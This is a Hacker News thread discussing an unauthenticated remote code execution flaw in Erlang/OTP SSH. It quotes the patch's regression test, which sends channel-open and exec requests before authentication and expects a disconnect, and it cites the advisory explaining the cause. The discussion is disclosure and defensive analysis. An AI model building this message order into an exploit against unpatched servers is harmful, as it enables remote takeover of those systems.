←back to thread

Unauthenticated Remote Code Execution in Erlang/OTP SSH

(nvd.nist.gov)
198 points kimi | 1 comments | 17 Apr 25 13:29 UTC | HN request time: 0.212s | source
Show context
formerly_proven ◴[17 Apr 25 15:31 UTC] No.43718329[source]
If I interpret the patch correctly the issue seems to be that you could just ask for a channel and do a request_exec before authenticating. The regression test is:

    {send, hello},
    {send, ssh_msg_kexinit},
    {match, #ssh_msg_kexinit{_='_'}, receive_msg},
    {send, SshMsgChannelOpen},
    {send, SshMsgChannelRequest},
    {match, disconnect(), receive_msg}
https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a...

edit: Ah, found by the people at RUB, they do a lot of research in verifying protocol implementations iirc.

replies(4): >>43718365 #>>43718897 #>>43719016 #>>43720515 #
1. password4321 ◴[17 Apr 25 18:30 UTC] No.43720515[source]
> The issue is caused by a flaw in the SSH protocol message handling which allows an attacker to send connection protocol messages prior to authentication.

per https://www.openwall.com/lists/oss-security/2025/04/16/2